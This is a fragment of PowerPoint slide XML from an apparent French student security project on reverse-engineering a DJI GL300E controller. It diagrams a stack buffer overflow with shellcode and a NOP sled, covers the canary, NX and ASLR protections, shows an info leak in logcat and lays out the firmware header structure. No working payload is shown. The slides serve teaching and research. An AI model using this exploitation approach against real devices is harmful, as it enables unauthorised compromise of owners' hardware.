          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>pop {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>fp,pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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PC = 0x41414141 SIGSEGV</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35855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Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow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63952" y="3052194"/>
            <a:ext cx="20162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655840" y="3052193"/>
            <a:ext cx="10081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680176" y="305219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87688" y="2867527"/>
            <a:ext cx="121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FP (R11)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12224" y="2867527"/>
            <a:ext cx="5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63952" y="2628529"/>
            <a:ext cx="2016224" cy="423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BBBB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663952" y="2204865"/>
            <a:ext cx="2016224" cy="423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0xbffffe580</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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91944" y="638360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27948" y="16763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663952" y="3052194"/>
            <a:ext cx="2016224" cy="10379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Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="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727848" y="5542181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99656" y="5357515"/>
            <a:ext cx="172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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uffer [32];</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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40216" y="3429000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j-lt"/>
              </a:rPr>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> sp,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>,#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>xx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>pop {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>fp,pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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PC = 0xbfffe580 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>execute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shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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3952" y="4077525"/>
            <a:ext cx="2016224" cy="1464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NOPSled</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Connecteur en angle 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="1"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5663952" y="2416697"/>
            <a:ext cx="12700" cy="2393156"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3616220"/>
            </a:avLst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Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow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0" y="1600200"/>
            <a:ext cx="10441160" cy="51334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3432" y="5589240"/>
            <a:ext cx="273630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447928" y="3212976"/>
            <a:ext cx="46805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159896" y="5085184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79976" y="48966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ocal buffer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0" y="1600200"/>
            <a:ext cx="10441160" cy="51334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Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow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7" y="1914525"/>
            <a:ext cx="53816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Security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15480" y="1916832"/>
            <a:ext cx="104411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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>checksec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> bin/assistant </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[*] '/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/bin/assistant'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Arch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:     arm-32-little</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>    RELRO:    Full RELRO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Canary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found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    NX:       NX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>enabled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    PIE:      PIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>enabled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    FORTIFY:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Enabled</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>shell@gl300e:/ $ cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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3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Canary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636912"/>
            <a:ext cx="6431276" cy="3888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1126" y="1876890"/>
            <a:ext cx="3874793" cy="310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buffer[XX];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048328" y="1876887"/>
            <a:ext cx="936100" cy="31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FP (R11)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984428" y="1876887"/>
            <a:ext cx="864101" cy="31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75918" y="1876887"/>
            <a:ext cx="936103" cy="310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canary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032104" y="1876888"/>
            <a:ext cx="2016223" cy="31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R4 – R10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12019" y="1876887"/>
            <a:ext cx="720084" cy="31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501126" y="2348880"/>
            <a:ext cx="48108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ASLR (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Randomization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524000" y="18448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Technique permettant de place de façon aléatoire les zones de données dans la mémoire virtuelle (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Wikipédia)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248128" y="3501008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0x7ffd9dc8a520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0x7ffc03c26f70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0x7ffcba2528c0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0x7ffe46c63d10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0x7ffc053999f0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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55440" y="3501008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0x7fffffffe5a0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0x7fffffffe5a0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0x7fffffffe5a0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0x7fffffffe5a0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>thomas@debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:/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$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>testaslr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buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1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</a:t>
            </a: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0x7fffffffe5a0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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27448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ASLR OFF:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="ZoneTexte 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7255960" y="31316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ASLR ON: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0783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ASLR (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Address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Randomization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Layout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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3060577"/>
            <a:ext cx="20162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95800" y="3060576"/>
            <a:ext cx="10081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7320136" y="3060576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927648" y="2875910"/>
            <a:ext cx="121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FP (R11)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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52184" y="2875910"/>
            <a:ext cx="5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03912" y="2636912"/>
            <a:ext cx="2016224" cy="423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BBBB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03912" y="2213248"/>
            <a:ext cx="2016224" cy="423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???????</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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31904" y="63919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67908" y="168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303912" y="3060577"/>
            <a:ext cx="2016224" cy="10379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Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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367808" y="5550564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639616" y="5365898"/>
            <a:ext cx="172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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uffer [32];</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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80176" y="343738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j-lt"/>
              </a:rPr>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: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r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>pop {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>fp,pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>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3912" y="4085908"/>
            <a:ext cx="2016224" cy="1464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NOPSled</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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3611724" y="4803934"/>
            <a:ext cx="1512168" cy="9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151571" y="461926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0x????????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7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00200"/>
            <a:ext cx="7344816" cy="48998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84232" y="160020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Projet Cyber 2 :  Reverse du protocole DJI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>uteur : Guillaume Chouquet</a:t>
            </a:r>
          </a:p>
          <a:p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184232" y="2800529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Maxime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Batard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Maxime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Fellay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Loris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Coutant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Julien </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Nicot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Et moi x)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NX (No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>eXecute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63952" y="3052194"/>
            <a:ext cx="20162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55840" y="3052193"/>
            <a:ext cx="10081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7680176" y="305219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87688" y="2867527"/>
            <a:ext cx="121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FP (R11)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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12224" y="2867527"/>
            <a:ext cx="5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663952" y="2628529"/>
            <a:ext cx="2016224" cy="423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BBBB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663952" y="2204865"/>
            <a:ext cx="2016224" cy="423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0xbffffe580</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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944" y="638360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27948" y="16763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63952" y="3052194"/>
            <a:ext cx="2016224" cy="10379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Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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727848" y="5542181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999656" y="5357515"/>
            <a:ext cx="172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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uffer [32];</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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40216" y="342900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j-lt"/>
              </a:rPr>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>pop {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>fp,pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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PC = 0xbfffe580 =&gt; SIGSEV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3952" y="4077525"/>
            <a:ext cx="2016224" cy="1464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NOPSled</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Connecteur en angle 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="1"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5663952" y="2416697"/>
            <a:ext cx="12700" cy="2393156"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3616220"/>
            </a:avLst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Multiplier 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4583832" y="3086885"/>
            <a:ext cx="1296144" cy="1538302"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 114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991544" y="3645756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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> non exécutable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535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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>leak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67408" y="1844824"/>
            <a:ext cx="11305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+mj-lt"/>
              </a:rPr>
              <a:t>shell@gl300e:/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>logcat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| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 'assistant'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>kMsgParseBigPackage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>_ 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>magic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 305419896 , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mFirmwareNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 2  DJI GL300E ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>head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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 170</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>getFirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> id 0x1,len 1 ,md5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ØÈõa&amp;îÇ4§╚VN\gªØÈõa&amp;îÇ4§╚VN\gª</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dji_version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hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 1, 1 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>getFirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> id 0x1,len 1 ,md5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ØÈõa&amp;îÇ4§╚VN\gªØÈõa&amp;îÇ4§╚VN\gª║Â£Áð½£Á    ?º£ÁÑ\ÝÂ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E/assistant update(  159): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dji_version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hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 1, 1 0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/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7762" y="5373216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Pas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> byte en fin de chaîne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2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1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> structure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10146"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="263352" y="1907311"/>
          <a:ext cx="8136904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4042"/>
                <a:gridCol w="585286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Field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 (bytes)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Magic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6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latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>HeaderLen</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR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field_8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VersionCode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ManufacterString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16 (DJI)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ModelString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16 (GL300E)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nModules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Field_2E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>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>4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Field_32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4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Field_36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10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Modules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nModules</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> * </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>sizeof</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Module_Header</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>)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CRC16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50545"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9001791" y="1916996"/>
          <a:ext cx="2808312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156"/>
                <a:gridCol w="140415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Field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 (bytes)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Type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+mj-lt"/>
                        </a:rPr>
                        <a:t>Special</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR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Field_2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Version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4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Offset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4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+mj-lt"/>
                        </a:rPr>
                        <a:t>Length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4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Length2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j-lt"/>
                        </a:rPr>
                        <a:t>MD5</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR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16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MD5_2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16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91344" y="15476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Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t> header : 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8976320" y="15476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Module header :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263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Exploit time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Stage 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
